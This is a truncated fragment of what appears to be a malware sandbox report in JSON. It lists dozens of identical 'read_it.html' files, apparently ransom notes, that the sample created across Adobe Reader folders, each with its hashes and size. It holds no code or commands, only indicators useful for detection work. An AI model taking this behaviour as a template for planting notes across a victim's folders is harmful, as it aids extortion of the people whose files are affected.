(x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_458", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_459", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_460", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_461", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_462", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_463", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_464", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_465", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_466", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_467", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_468", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_469", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_470", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_471", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_472", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_473", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_474", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_475", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_476", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_477", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_478", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_479", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_480", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_481", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_482", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_483", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_484", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_485", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_486", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_487", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_488", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_489", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_490", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_491", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_492", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_493", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_494", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_495", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_496", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_497", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_498", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_499", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_500", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_501", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_502", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_503", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_504", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_505", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_506", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_507", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_508", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_509", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_510", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 